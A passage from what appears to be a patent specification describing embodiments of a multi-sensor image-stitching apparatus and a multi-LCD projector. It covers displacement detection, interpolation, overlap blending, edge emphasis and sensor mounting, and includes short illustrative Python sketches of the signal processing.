(FIG. 17).
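The inverse-function correction performed by the circuits 47 and 48 can be pictured as a per-column gain table. The sketch below is schematic only: the linear falloff is an invented stand-in for the actual distributions of FIG. 15, which depend on the optics.

```python
import numpy as np

# Schematic light distribution across one imaging area (invented falloff;
# the real curve is fixed by the prism coating and the aperture).
width = 1000
light = np.linspace(1.0, 0.5, width)

# Inverse-function gain, realizable as a look-up table per column:
gain = 1.0 / light

def correct_light_amount(frame):
    """Equalize the distributions by scaling each column by its gain,
    as the light-amount correcting circuits 47 and 48 do."""
    return frame * gain[np.newaxis, :]
```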
As indicated above, in the image processing apparatus according to the fourth embodiment of the invention, the separator lenses 1c are used, in place of prisms, to split the input light flux into two parts. Since the lenses 1c are smaller than prisms, the light-splitting section of the apparatus can easily be made small.

Another image processing apparatus, which is a fifth embodiment of this invention, will be described with reference to FIGS. 20 and 21. As is evident from FIG. 20, the fifth embodiment is similar to the embodiment of FIG. 18, and the same components as those of the embodiment of FIG. 18 are denoted by the same reference numerals in FIG. 20 and will not be described in detail.

As has been described, in the first embodiment, the values for the pixels d_ij of one half of the display screen (i=u+1 to u+v, j=1 to w) are interpolated, whereas the values for the pixels of the other half of the screen are the pixel signals which the CMD 8 has output. The interpolated values of the screen pixels may deteriorate in some cases, as compared to those which are the pixel signals output by the CMD 8, and the left and right halves of the image the first embodiment forms may therefore differ in resolution. The fifth embodiment is designed to form a single image of uniform resolution.

As FIG. 21 shows, the CMDs 8 and 9 (FIG. 20) are so positioned that their imaging areas incline at the same angle to the display area of a display section 31 (FIG. 20). Thus, as is shown in FIG. 21, if the imaging area of the CMD 8 is inclined at angle θ to that of the CMD 9, the imaging areas of the CMDs 8 and 9 incline at an angle of θ/2 to the display area. In this case, the values of the screen pixels d_ij (i=1 to (u+v)/2, j=1 to w) defining the half display area on the left of the broken line are interpolated from the pixel signals output by the CMD 8, whereas the values of the screen pixels d_ij (i=(u+v)/2 to u+v, j=1 to w) defining the half display area on the right of the broken line are interpolated from the pixel signals output by the CMD 9.

The fifth embodiment has a CMD rotating mechanism 49. The mechanism 49 rotates the CMDs 8 and 9, inclining their imaging areas at the same angle to the display area, if the imaging areas of the CMDs 8 and 9 incline to the display area when the image processing apparatus is held with its display area extending horizontally. The angle by which the mechanism 49 rotates either imaging area to the display area is determined by the conversion factors R and S which have been detected by a displacement-detecting circuit 24. The fifth embodiment further comprises an additional interpolation circuit 25, which performs interpolation on the pixel signals output by the CMD 8 to calculate the values of the screen pixels defining the left half display area (FIG. 20).

Since the CMD rotating mechanism 49 rotates the CMDs 8 and 9, if necessary, thereby inclining their imaging areas at the same angle to the display area, the image processing apparatus can form an image which is uniform in resolution. The imaging areas of the CMDs need not be inclined at exactly the same angle to the display area; even then, an image can be formed which has a substantially uniform resolution.
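Geometrically, the fifth embodiment replaces one rotation by θ with two rotations by ±θ/2, so both halves are resampled through transformations of equal magnitude. A small sketch (the function name is invented):

```python
import numpy as np

def half_angle_rotations(theta):
    """Rotation matrices of +theta/2 and -theta/2, applied to the halves
    taken from the CMD 8 and the CMD 9 respectively, so that each half
    undergoes the same amount of interpolation."""
    def rot(t):
        return np.array([[np.cos(t), -np.sin(t)],
                         [np.sin(t),  np.cos(t)]])
    return rot(theta / 2.0), rot(-theta / 2.0)
```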
It should be noted that the CMD rotating mechanism 49, which characterizes the fifth embodiment, may be incorporated in the first to fourth embodiments as well.

An image processing apparatus, which is a sixth embodiment of the invention, will be described with reference to FIGS. 22A and 22B. As may be understood from FIG. 22A, the sixth embodiment has components similar to those of the first embodiment shown in FIG. 6. Therefore, the same components as those of the first embodiment are denoted by the same reference numerals in FIG. 22A and will not be described in detail.

As is evident from FIG. 22A, four CMDs 51, 52, 53, and 54 are provided, each having a 1000×1000 pixel matrix. Each CMD has as many pixels as a general-purpose NTSC imaging device. Hence, the CMDs 51 to 54 can be manufactured with a much higher yield than HDTV imaging devices, which have a 1920×1035 pixel matrix. As FIG. 22B shows, the CMDs 51 to 54 are mounted on a half prism 1d and juxtaposed, with the CMD 51 used as the positional reference, such that their imaging areas overlap at regions a, b, and c.

Like any embodiment described above, the sixth embodiment has a displacement-detecting circuit 24. The circuit 24 detects the displacements of the CMDs 52, 53, and 54, each in the form of conversion factors S and R (i.e., displacement S and rotation angle R), from the image signals representing the overlap regions a, b, and c. The three displacement data items, each consisting of the factors S and R, are input to three interpolation circuits 25, respectively.

In the sixth embodiment, the half prism 1d is used as the light-splitting section 1. Nonetheless, the half prism 1d may be replaced by two such prisms as used in the third embodiment, one of which has a coating on a part of its output surface and consists of two portions having different transmission coefficients. Further, each of the interpolation circuits 25 may have built-in coefficient memories, as in the second embodiment, which is shown in FIG. 13.

Another image processing apparatus, which is a seventh embodiment of the invention, will be described. The seventh embodiment is identical to the sixth embodiment (FIG. 22A), except that its light-splitting section is of any one of the types illustrated in FIGS. 23A, 23B, 23C, and 23D, and thus differs from that of the sixth embodiment, which is a half prism 1d on which four CMDs are mounted.

FIG. 23A shows the first type of the light-splitting section 1, which comprises two wedge-shaped prisms 60 and 61 and a beam splitter 63. The prisms 60 and 61 and the beam splitter 63 cooperate, splitting the input light into four parts. The parts of the input light are applied to CMDs 55, 56, 57, and 58, forming four parts of an object image on the imaging areas of the CMDs 55 to 58, respectively, as is illustrated in FIG. 26.

FIG. 24A is a side view of the light-splitting section 1 shown in FIG. 23A, and FIG. 24B is a plan view thereof. As clearly illustrated in FIGS. 24A and 24B, the wedge-shaped prisms 60 and 61 split the input light into two parts, each of which is split by the beam splitter 63 into two parts. As a result, the input light is divided into four parts. The beam splitter 63 is formed of two right-angle prisms connected together. As shown in FIG. 24A, a total-reflection mirror coating is applied to the upper half of the interface between the right-angle prisms.
FIG. 23B shows the second type of the light-splitting section 1, which differs from the type of FIG. 23A in that two eccentric lenses 64 and 65 are used in place of the two wedge-shaped prisms 60 and 61. Unlike the prisms 60 and 61, which merely deflect a light flux, the eccentric lenses 64 and 65 not only deflect a light flux but also form an image. The objective lens 6, through which the input light is applied to the eccentric lenses 64 and 65, may be of the type which emits an afocal flux (see FIGS. 25A and 25B). The light-splitting section 1 of the second type (FIG. 23B) need not be positioned so precisely with respect to the objective lens 6, owing to the use of the eccentric lenses 64 and 65. This facilitates the assembling of the image processing apparatus. Both eccentric lenses 64 and 65 are achromatic doublets, but they can be lenses of any other types.

FIG. 23C shows the third type of the light-splitting section 1, which comprises four wedge-shaped prisms 66, 67, 68, and 69. These prisms 66 to 69 are connected, side to side, forming a 2×2 matrix which has a concavity at the center. The input light applied via the objective lens 6 onto the 2×2 matrix is divided into four parts, i.e., an upper-left part, a lower-left part, an upper-right part, and a lower-right part. Each of the wedge-shaped prisms is an achromatic prism consisting of two glass components which have different refractive indices. It is desirable that a telecentric system be located at the output of the objective lens 6, to prevent the distortion of the image which would otherwise occur due to the flux refraction caused by the wedge-shaped prisms 66 to 69. Hence, the telecentric system serves to accomplish good image synthesis.

FIG. 23D shows the fourth type of the light-splitting section 1, which comprises four eccentric lenses 70, 71, 72, and 73 connected, side to side, forming a 2×2 matrix. It is desirable that this light-splitting section 1 be used in combination with an objective lens 6 which emits an afocal flux. The seventh embodiment, which has a light-splitting section comprising prisms or lenses, needs light-amount correcting circuits of the type described above.

As may be understood from the above description, the seventh embodiment is an image processing apparatus which has four solid-state imaging devices. The imaging devices are not restricted to CMDs. Needless to say, they may be CCDs or AMIs. If CCDs for use in NTSC, which are generally used imaging devices and have 768×480 pixels each, are utilized in the seventh embodiment, the seventh embodiment will form an image of resolution as high as about 1400×800 pixels, the four imaging areas being combined with their overlap regions subtracted. Alternatively, four imaging devices for use in PAL, each having 820×640 pixels, may be employed. In this case, the seventh embodiment will form an image of still higher resolution.

An image processing apparatus, which is an eighth embodiment of this invention, will be described with reference to FIG. 27. This embodiment is identical to the first embodiment (FIG. 6), except for the features which will be described below. The seventh embodiment described above has four imaging devices. According to the present invention, however, the number of imaging devices used is not limited to four at all. The eighth embodiment of the invention is characterized in that it has a large number of lenses and a large number of imaging devices, that is, a lens array 74 and a CMD array 75, as is clearly shown in FIG. 27. The lenses and the CMDs have a one-to-one relation, and the CMDs have their imaging areas overlapping in part.
The lens array 74 has a light shield formed on its entire surface, except for the lenses. The lens array 74 can be produced at low cost by means of, for example, press-processing. The imaging devices used in the eighth embodiment are not restricted to CMDs. Rather, they may be CCDs, MOS devices, or the like.

It will now be explained how the imaging devices are positioned in each of the fourth to eighth embodiments described above. In the fourth to eighth embodiments, the CMDs are located close to one another and cannot be located at such positions as shown in FIGS. 19A to 19C. Thus, they are positioned by one of various methods, which will be described with reference to FIGS. 28 to 32, FIGS. 33A to 33C, and FIG. 34.

FIGS. 28 and 29 are a plan view and a sectional view, respectively, explaining the first method of positioning CMDs. In this method, CMDs 81 and 82 are mounted, in the form of bare chips, on a ceramic substrate 80, as is shown in FIG. 28. As is best shown in FIG. 29, a sectional view taken along line 29--29 in FIG. 28, the CMDs 81 and 82 are set in two square recesses formed in the surface of the ceramic substrate 80 and fixed with adhesive 83. The rims of either square recess have been planed off, so that the adhesive 83 can be applied in sufficient quantity. The recesses are positioned and formed so precisely that the CMDs 81 and 82 are positioned with sufficient precision when they are set in the recesses. The electrodes of the CMDs 81 and 82 are bonded to the electrodes formed on the ceramic substrate 80, respectively. The electrodes on the substrate 80 are, in turn, connected to terminals 85 formed at the edges of the substrate 80 for electrically connecting the CMDs 81 and 82 to external components. As shown in FIG. 30, the terminals 85 may protrude downward from the edges of the ceramic substrate 80.

The square recesses made in the surface of the substrate 80 not only serve the purpose of positioning the CMDs 81 and 82 with the required precision but also serve to provide a broad effective imaging area. The adhesive 83 is applied to the sides of each CMD, as shown in FIG. 29, not to the bottom of the CMD, so that the position of the CMD may be adjusted with respect to the optical axis of the light-splitting section. Were the adhesive 83 applied to the bottom of the CMD, the CMD might tilt or move to assume an undesirable position with respect to the optical axis of the light-splitting section.

Each CMD may be fastened to the ceramic substrate 80 in another way. As FIG. 29 shows, a hole 87 may be bored in the substrate 80 from the lower surface thereof, and adhesive 88 may be applied in the hole. This method of securing the CMD to the substrate 80 is advantageous in two respects. First, it minimizes the risk that the adhesive will cover the light-receiving surface of the CMD. Second, much care need not be taken in applying the adhesive 88.

FIG. 31 is a cross-sectional view, explaining the second method of positioning CMDs. In the second method, a ceramic substrate 80 is bonded to a prism or a quartz filter (not shown) by means of spacers 90 mounted on both edges of the substrate 80. As a result, the substrate 80 is spaced away from the prism or the filter. Hence, no load is exerted from the prism or filter on the bonding wires 91 formed on the substrate 80, provided that the height H of the spacers 90 is greater than the height h of the bonding wires 91.

FIG. 32 is a plan view, explaining the third method of positioning bare CMDs.
This method uses a substrate 80 having rectangular recesses in its surface. Bare CMD chips 82 are placed in the recesses, respectively, each abutted on one edge of the recess and thereby positioned in the horizontal direction. The chips 82, thus positioned, are fixed to the substrate 80 by means of adhesive.

FIGS. 33A to 33C explain the fourth method of positioning CMDs, which is employed to manufacture the image processing apparatus according to the sixth embodiment. FIG. 33A is a side view, FIG. 33B a front view seen in the direction of arrow B in FIG. 33A, and FIG. 33C a bottom view seen in the direction of arrow A in FIG. 33A. As shown in FIG. 33C, spacers 90 are mounted on a substrate 80, thereby protecting the bonding wires 91.

FIG. 34 is a side view, explaining the fifth method of positioning CMDs. In this method, two ceramic substrates 80 are secured to a backing member 92 which has a right-angle, L-shaped cross section. Spacers 90 are mounted on the substrates 80, and a half prism 93 is abutted on the spacers 90. Hence, the half prism 93 is secured, at its two adjoining sides, to the ceramic substrates 80 and spaced away therefrom by the height H of the spacers 90.

Another image processing apparatus, which is a ninth embodiment of the invention, will be described with reference to FIG. 35A. As a comparison between FIG. 17 and FIG. 35A may reveal, the ninth embodiment is similar to the third embodiment but differs in that an image-synthesizing circuit 121 is added. Therefore, the same components as those of the third embodiment (FIG. 17) are denoted by the same reference numerals in FIG. 35A and will not be described in detail.

The image-synthesizing circuit 121 has the structure shown in FIG. 36. The circuit 121 comprises a pixel-value converter 122 and a pixel selector 123. The value f of an input pixel and the value g of another input pixel to be combined with the first-mentioned pixel are input to both the converter 122 and the selector 123. The pixel selector 123 selects those pixels which are located near an overlap region, in accordance with the vector (coordinate value) X_1 representing the position of an output pixel. The pixel-value converter 122 converts the input values of the two pixels so as to display an image which has no discontinuity. More precisely, as FIG. 37 illustrates, the converter 122 converts the input values in accordance with the positions the pixels assume within an overlap region.

Alternatively, the image-synthesizing circuit 121 may have the structure shown in FIG. 38. That is, the circuit 121 may comprise a coefficient-setting circuit 124, two multipliers 125a and 125b, and an adder 126. The circuit 124 sets weighting coefficients a and b for the two input pixel values f and g. The multiplier 125a multiplies the pixel value f by the weighting coefficient a, and the multiplier 125b multiplies the pixel value g by the weighting coefficient b. The adder 126 adds the outputs of the multipliers 125a and 125b, generating the sum (fa+gb), which is input as an output pixel value to the frame memory 30 (FIG. 35A). The coefficient-setting circuit 124 sets the coefficient for either pixel at a value of "1.0" if the pixel is located outside the overlap region, and at a value linearly ranging from "0.0" to "1.0" if the pixel is located in the overlap region. In FIG. 39, X_1 is the coordinate in the direction in which the image parts are combined, and P_2 - P_1 is the length of the overlap region.
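The coefficient scheme of FIGS. 38 and 39 amounts to a linear cross-fade across the overlap region. A sketch of one output pixel (the function name is invented; p1 and p2 stand for the positions P_1 and P_2 along the combining direction):

```python
def blend(f, g, x1, p1, p2):
    """Output pixel value fa + gb, as produced by the coefficient-setting
    circuit 124, the multipliers 125a and 125b, and the adder 126.
    x1 is the coordinate in the combining direction."""
    if x1 <= p1:                      # outside overlap: first image only
        a, b = 1.0, 0.0
    elif x1 >= p2:                    # outside overlap: second image only
        a, b = 0.0, 1.0
    else:                             # inside overlap: a falls, b rises
        b = (x1 - p1) / (p2 - p1)
        a = 1.0 - b
    return a * f + b * g
```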
As may be understood from FIGS. 38 and 39, the circuit 121 shown in FIG. 38 leaves the input pixel values f and g unchanged if the pixels are located outside the overlap region. If the pixels are located in the overlap region, the circuit 121 linearly changes the weighting coefficients a and b, multiplies the values f and g by the coefficients a and b, respectively, obtaining fa and gb, adds the values fa and gb, and outputs the sum (fa+gb) as an output pixel value. Hence, the resultant image has no brightness discontinuity which would otherwise result from the difference in sensitivity between the imaging devices. The image-synthesizing circuit 121 can also reduce the geometrical discontinuity, if any, that occurs in the overlap region due to the correlation and the interpolation which the displacement-detecting circuit 24 and the interpolation circuit 25 perform. Thus the circuit 121 can decrease, to some degree, the brightness discontinuity and geometrical discontinuity in the vicinity of the overlap region. Once the displacement-detecting circuit 24 has detected the displacement, the light-amount correcting circuits 47 and 48 may be removed, so that the image-synthesizing circuit 121 can be made simple, comprising only an adder, as is illustrated in FIG. 35B. This is because the circuit 121 no longer needs to change the coefficients a and b linearly, since the light amounts on the imaging areas of the CMDs gradually change in the overlap region, as is shown in FIG. 15. To reduce the brightness discontinuity further, the bias gains of the SPs (Signal Processors) 20 and 21 may be adjusted.

An image processing apparatus, which is a tenth embodiment of the invention, will be described with reference to FIG. 40. The tenth embodiment is identical to the ninth embodiment (FIG. 35A), except that an edge-emphasizing circuit 127 is connected between the output of an interpolation circuit 25 and an image-synthesizing circuit 121. The circuit 127 is designed to restore the quality of an image which has deteriorated due to the interpolation effected by the interpolation circuit 25. The same components as those of the ninth embodiment are denoted by the same reference numerals in FIG. 40, and only the characterizing features of the tenth embodiment will be described in detail.

The edge-emphasizing circuit 127 calculates a Laplacian by using the local operator of a digital filter or the like. For instance, the circuit 127 calculates a Laplacian from an original image f, producing an emphasized image g. That is:

g(x, y) = f(x, y) - ω·∇²f(x, y)

where ω is a constant (see FIG. 42D) and ∇² is a Laplace operator. The Laplace operator used here is, for example, one of the operators of FIGS. 42A, 42B, and 42C. Alternatively, a selective image-emphasizing method may be performed, using an operator h(x, y) for detecting, for example, the lines forming the input image.

Another method of emphasizing the edges is to use a high-pass filter. To be more specific, the input image data is subjected to Fourier transformation and then input to the high-pass filter. The filter emphasizes the high-frequency component of the image data, after which inverse Fourier transformation is performed. In order to emphasize the input image uniformly, the edge-emphasis may be performed after shifting each pixel of the reference image by a predetermined distance (e.g., 1/2 pixel width, 1/3 pixel width, or the like), interpolating the pixel, and inputting the pixel to the image-synthesizing circuit 121.
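A sketch of the Laplacian edge emphasis, using one common 3×3 operator as a plausible stand-in for the operators of FIGS. 42A to 42C, which are not reproduced here; the kernel and the value of ω are assumptions.

```python
import numpy as np
from scipy.ndimage import convolve

# An assumed 3x3 Laplace operator (FIGS. 42A-42C show the actual variants).
LAPLACE = np.array([[0.0,  1.0, 0.0],
                    [1.0, -4.0, 1.0],
                    [0.0,  1.0, 0.0]])

def edge_emphasize(f, omega=0.5):
    """g = f - omega * laplacian(f): subtracting the Laplacian steepens
    intensity transitions, restoring edges softened by interpolation."""
    return f - omega * convolve(f, LAPLACE, mode="nearest")
```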
FIG. 41 shows a modification of the tenth embodiment (FIG. 40), in which an edge-emphasizing circuit 127 is connected to the output of an image-synthesizing circuit 121 so that the synthesized image data output by the circuit 121 may be edge-emphasized uniformly.

An image processing apparatus, which is an eleventh embodiment of the invention, will be described with reference to FIGS. 43 and 44, FIGS. 45A to 45C, and FIGS. 46A and 46B. As can be understood from FIGS. 43 and 44, which show the eleventh embodiment, the embodiment is characterized in that the displacements of the CMDs 8 and 9 are detected by using a reference image which has such a specific pattern as is shown in FIG. 45A, 45B, or 45C. In the case of the image pattern of FIG. 45A, the positions of the intersections of the crosses are measured with high precision. In the case of the pattern of FIG. 45B, the positions of the dots are measured with high precision. In the case of the pattern of FIG. 45C, the positions of the intersections of the lines are measured with high precision.

The reference image is photographed, whereby the CMDs 8 and 9 generate image data items representing a left half-image and a right half-image, respectively, as can be understood from FIG. 43. The data items representing these half-images are input to reference pattern-detecting and displacement-calculating circuits 130 and 131, respectively. The circuits 130 and 131 detect the half-images of the reference pattern and calculate the displacements (each consisting of a shift distance and a rotation angle) of the half-images, i.e., the displacements of the CMDs 8 and 9, from the data representing the positions of the intersections of the crosses or lines defining the image patterns (FIG. 45A, 45B, or 45C). The displacements, thus calculated, are stored into displacement memories 132 and 133. Then, the displacements stored in the memories 132 and 133 are processed in the same way as in the tenth embodiment, as can be understood from FIG. 44.

Various methods can be utilized to detect the reference patterns. To detect the pattern of FIG. 45A or 45C, the vicinity of each line may be tracked. To detect the pattern of FIG. 45B, the center of each dot may be detected. Many patterns other than those of FIGS. 45A, 45B, and 45C can be used in the eleventh embodiment. Owing to the use of a reference image, the displacements of the CMDs 8 and 9 can be detected even if each half-image has so narrow an overlap region that correlation alone cannot detect the displacement of the corresponding CMD. In this respect the eleventh embodiment is advantageous.

Another image processing apparatus, which is a twelfth embodiment of the invention, will be described with reference to FIGS. 46A and 46B, FIG. 47, and FIGS. 48A and 48B. As is evident from FIG. 47, the embodiment is characterized by the use of a reference pattern filter 135 through which an optical image of an object is applied to an objective lens 6. The reference pattern filter 135 is either of the type shown in FIG. 46A or of the type shown in FIG. 46B. The pattern filter of FIG. 46A has a reference pattern which consists of two crosses located at the upper and lower portions of the overlap region, respectively. The pattern filter of FIG. 46B has a reference pattern which consists of two dots located at the upper and lower portions of the overlap region, respectively. The reference pattern of either type is read along with the input image halves.

As FIG. 47 shows, the twelfth embodiment has a reference pattern-detecting and displacement-calculating circuit 136, which detects the reference pattern from the upper and lower edge portions of the overlap region. More specifically, the circuit 136 detects the reference pattern of FIG. 46A by tracking the vicinity of each of the lines forming the crosses, and detects the reference pattern of FIG. 46B by detecting the center of each dot. The circuit 136 determines the displacements of the left and right halves of the input image from the reference pattern. Thereafter, the same sequence of operations is carried out as in the tenth embodiment. The reference pattern filter 135 is useful and effective, particularly in the case where the input image is one reproduced from silver-salt film.

The twelfth embodiment can quickly determine the positional relation between the left and right halves of the input image. Since the reference pattern filter 135 is used, the relative positions of the image halves can be detected more accurately than otherwise. The filter 135 may be removed from the optical path of the objective lens 6, so the system structure can be modified quite easily.
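When a reference pattern yields several matched point pairs (cross intersections or dot centers) rather than just two displacement vectors, the shift and the rotation angle can be estimated by a least-squares fit. The sketch below is a standard two-dimensional rigid-registration computation, offered as an illustration rather than as the patent's circuit:

```python
import numpy as np

def fit_displacement(pts1, pts2):
    """Least-squares rotation matrix R and shift S mapping the reference
    points detected in one half-image (pts1) onto the matching points in
    the other (pts2); both are (N, 2) arrays, with points mapped as
    x2 = R @ x1 + S."""
    p, q = np.asarray(pts1, float), np.asarray(pts2, float)
    pc, qc = p - p.mean(axis=0), q - q.mean(axis=0)   # center the points
    theta = np.arctan2(np.sum(pc[:, 0]*qc[:, 1] - pc[:, 1]*qc[:, 0]),
                       np.sum(pc[:, 0]*qc[:, 0] + pc[:, 1]*qc[:, 1]))
    R = np.array([[np.cos(theta), -np.sin(theta)],
                  [np.sin(theta),  np.cos(theta)]])
    S = q.mean(axis=0) - R @ p.mean(axis=0)           # shift of centroids
    return R, S
```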
An image processing apparatus according to a thirteenth embodiment of the invention will be described with reference to FIGS. 48A and 48B and FIG. 49. This embodiment is identical to the tenth embodiment (FIG. 40), except that a rotation-angle detecting circuit 120 and a rotational interpolation circuit 123 are used, so that three or more image parts may be combined into a single image. The thirteenth embodiment is designed to prevent erroneous detection of the correlation among images even if there are many images to be combined and one image is greatly rotated with respect to another, as is shown in FIG. 48A.

The rotation angle R detected by a displacement-detecting circuit 24 is input to the rotation-angle detecting circuit 120. From the angle R, the circuit 120 determines whether or not the synthesized image output by an image-synthesizing circuit 7 should be processed by the rotational interpolation circuit 123. To be more precise, the circuit 120 connects the movable contact of a selector circuit 121 to the fixed contact A thereof if the angle R is greater than a threshold value, as is shown in FIG. 48A. In this case, the synthesized image is input to the rotational interpolation circuit 123. The circuit 123 rotates the image by an angle of -R, as is illustrated in FIG. 48B, and then combines the image with a third image. The resultant image, i.e., a combination of three images, is stored into a frame memory 30.

If the angle R is equal to or less than the threshold value, the rotation-angle detecting circuit 120 connects the movable contact of the selector circuit 121 to the fixed contact B thereof. In this case, the synthesized image is stored directly into the frame memory 30. When the thirteenth embodiment is employed to combine three or more images into a single image, the rotation-angle detecting circuit 120, the selector circuit 121, and the rotational interpolation circuit 123 cooperate to prevent erroneous correlation of images, i.e., mis-matching of images.

Another image processing apparatus, which is a fourteenth embodiment of the invention, will be described with reference to FIGS. 50A and 50B and FIG. 51. The fourteenth embodiment is identical to the tenth embodiment (FIG. 40), except that a circuit 125 is used which is designed to detect the ends of a border line. This embodiment is utilized to combine three or more images into one image.
If there are many images to combine, the right edge of the region over which a first image adjoins a second image may incline, as shown in FIG. 50A, and an undesired portion may be formed when the second image is combined with a third image by the process described with reference to FIGS. 38 and 39, since that process uses the center of the adjoining region as its reference. The fourteenth embodiment is designed to prevent the forming of such an undesired portion.

As is shown in FIG. 51, the data representing a left image is supplied to the circuit 125. The circuit 125 detects the ends A and B of the right border line of the image. The coordinate values of the end A, whose y-coordinate is less than that of the end B, are input to an image-synthesizing circuit 7. The circuit 7 uses the y-coordinate of the end A to define the right edge of the region over which the second and the third image adjoin, as shown in FIGS. 50A and 50B. Then, as FIG. 50B shows, the circuit 7 combines the synthesized image with the next image such that the point A defines the right edge of the adjoining region and the adjoining region is positioned with its center line passing through the midpoint between the point A and the left edge of the overlap region.

In the fourteenth embodiment, the circuit 125 detects the ends A and B of the right border line of the left image, and the image-synthesizing circuit 7 uses the y-coordinate of the end A, which is less than that of the end B, to define the right edge of the adjoining region. As a result, an undesired portion is eliminated from the adjoining region.

Another image processing apparatus, according to a fifteenth embodiment of the present invention, will be described with reference to FIGS. 52, 53, and 54. As is shown in FIG. 53, the fifteenth embodiment comprises 16 CMDs, a first-type synthesis section, and second-type synthesis sections. Each CMD has a 4000×500 pixel matrix and outputs image data representing an image which overlaps the image formed by the adjacent CMD by a distance of about 60 pixels. The synthesis sections combine the 16 image data items output by these CMDs into a single image having a resolution as high as 4000×6000, which is the resolution achieved by silver-salt film.

The first-type synthesis section has the structure shown in FIG. 52. Each of the second-type synthesis sections has the structure shown in FIG. 54. Each second-type synthesis section is connected to receive two inputs. The first input is an image signal supplied from a CMD, and the second input is the image data read from the frame memory 30 of the preceding second-type synthesis section. The second input is input directly to a displacement-detecting circuit 24. Each second-type synthesis section also has a circuit 125, which serves to eliminate an undesired portion from the adjoining region of a synthesized input image.

As can be understood from FIG. 53, the image signals the 16 CMDs have generated are processed in 15 sequential image-synthesizing steps. The image processing apparatus according to the fifteenth embodiment can, therefore, form an image having a high resolution comparable with the resolution of 4000×6000 which is accomplished by silver-salt film.

An image processing apparatus, which is a sixteenth embodiment of the invention, will be described with reference to FIGS. 55 and 56.
As is evident from FIG. 55, this embodiment is similar to the fifteenth embodiment (FIG. 53), comprising 16 CMDs, first-type synthesis sections, and third-type synthesis sections. The first-type synthesis sections are identical to the first-type synthesis section incorporated in the fifteenth embodiment and shown in detail in FIG. 52. The third-type synthesis sections are identical to one another and have the structure illustrated in FIG. 56. In each of the third-type synthesis sections, the two data items read from the frame memories 30 of the preceding two synthesis sections are input to the displacement-detecting circuit 24. Each third-type synthesis section has a circuit 125 for eliminating an undesired portion of the adjoining region of a synthesized input image.

The sixteenth embodiment performs many image syntheses in parallel to shorten the time for forming a synthesized image. More specifically, it produces a synthesized image in only four sequential steps, whereas the fifteenth embodiment forms a synthesized image in 15 sequential steps. Obviously, the sixteenth embodiment can effect image-synthesizing faster than the fifteenth embodiment. In the fifteenth and sixteenth embodiments, 16 CMDs, each having 4000×500 pixels, are utilized. Nonetheless, more or fewer imaging devices, having the same number of pixels or a different number of pixels, may be incorporated in either embodiment, if necessary.

A projector, which is a seventeenth embodiment of this invention, will be described with reference to FIGS. 57 to 62. As shown in FIG. 57, the projector 126 is designed to project a plurality of images onto a screen 127, where they are combined into a single image. As is shown in FIG. 58, the projector 126 has a half prism 128 and three LCDs (Liquid-Crystal Displays) 129, 130, and 131. The LCDs display images, which are projected onto the screen 127 and combined thereon into a single image. As will be explained, the projector 126 can form a combined image with virtually no discontinuity even if the LCDs 129, 130, and 131 are not positioned precisely.

As shown in FIG. 59, the LCDs 129, 130, and 131 are mounted on the half prism 128. They are so positioned that the images projected from them are combined on the screen 127 into a single image which has overlap regions. A quartz filter 132 is placed in front of the light-emitting surface of the half prism 128. The filter 132 functions as a low-pass filter, preventing the individual pixels of each LCD from being visible on the screen 127 and degrading the quality of the projected image.

As is shown in FIG. 58, the seventeenth embodiment has an S,R memory 133 for storing the displacements (i.e., a distance S and a rotation angle R) of the LCDs 129, 130, and 131, which are determined by a specific method that will be described later. Video signals, i.e., image data representing an image to be formed on the screen 127, are stored into the frame memory 30. The image data is divided into three data items representing the three images which the LCDs 129, 130, and 131 are to display. The three data items are input to the interpolation circuits 134, 135, and 136, respectively. The circuits 134, 135, and 136 execute interpolation on the input data items in accordance with the displacement data read from the S,R memory 133, so that the divided images projected onto the screen 127 from the LCDs 129, 130, and 131 form a single image with no discontinuity. The interpolated data items are supplied to multipliers 137, 138, and 139, respectively.
The weighting coefficient calculator 140 calculates weighting coefficients in the same way as in the ninth embodiment, as has been explained with reference to FIG. 39. The weighting coefficients are supplied to the multipliers 137, 138, and 139. The multipliers 137, 138, and 139 multiply those pixel signals of the interpolated data items which represent the overlap regions of the three images to be projected onto the screen 127 by the weighting coefficients supplied from the calculator 140. The brightness of each overlap region is thereby adjusted. All pixel signals output from the multiplier 137 are stored into the memory 141; all pixel signals output from the multiplier 138, into the memory 142; and all pixel signals output from the multiplier 139, into the memory 143. The pixel signals read from the memory 141 are input to the D/A converter 144; the pixel signals read from the memory 142, to the D/A converter 145; and the pixel signals read from the memory 143, to the D/A converter 146. The D/A converters 144, 145, and 146 convert the input signals to three analog image data items, which are supplied to the LCDs 129, 130, and 131. Driven by these analog data items, the LCDs display three images, respectively. A light source 147 applies light to the LCD 130, and a light source 148 applies light to the LCDs 129 and 131. Hence, three beams bearing the images displayed by the LCDs 129, 130, and 131, respectively, are applied to the screen 127 through the half prism 128 and the quartz filter 132. As a result, the three images are combined on the screen 127 into a single image.

Because a plurality of LCDs are used, the seventeenth embodiment can serve as a projector which projects a high-resolution image onto a screen. Since the interpolation circuits 134, 135, and 136 and the S,R memory 133 cooperate to compensate for the displacements of the LCDs 129, 130, and 131, it is unnecessary to position the LCDs with high precision. In addition, since the multipliers 137, 138, and 139 multiply the pixel signals which represent the overlap regions of the three projected images by the weighting coefficients, the overlap regions are not conspicuous. Further, the quartz filter 132 prevents the images of the individual LCD pixels from being projected onto the screen 127, increasing the quality of the image formed on the screen 127. Three separate quartz filters may also be used, one for each LCD.

With reference to FIG. 60, it will now be explained how to detect the displacements of the LCDs 129, 130, and 131. As FIG. 60 shows, a displacement-detecting mirror 149 is interposed between a lens 6 and the quartz filter 132. The mirror 149 is inclined so as to receive the images projected from the LCDs 129, 130, and 131 and reflect them to a CCD 150 through a focusing lens 156. Hence, three images identical to those projected onto the screen 127 can be focused on the light-receiving surface of the CCD 150.

To detect the displacements of the LCDs 129, 130, and 131, three reference data items representing three reference images which are highly correlated and not displaced at all (S=R=0) are input to the interpolation circuits 134, 135, and 136, respectively. The circuits 134, 135, and 136 do not process the input data items at all, and the multipliers 137, 138, and 139 multiply these data items by a weighting coefficient of "1."

At first, the first data item is supplied to the LCD 129, which displays the first reference image. The mirror 149 reflects the first reference image, and the lens 156 focuses it on the CCD 150.
The CCD 150 converts the first reference image into analog signals, and an A/D converter 151 converts the analog signals to digital data. The digital data is stored into a memory 153 through a switch 152, whose movable contact is connected to the fixed contact a, which in turn is connected to the memory 153.

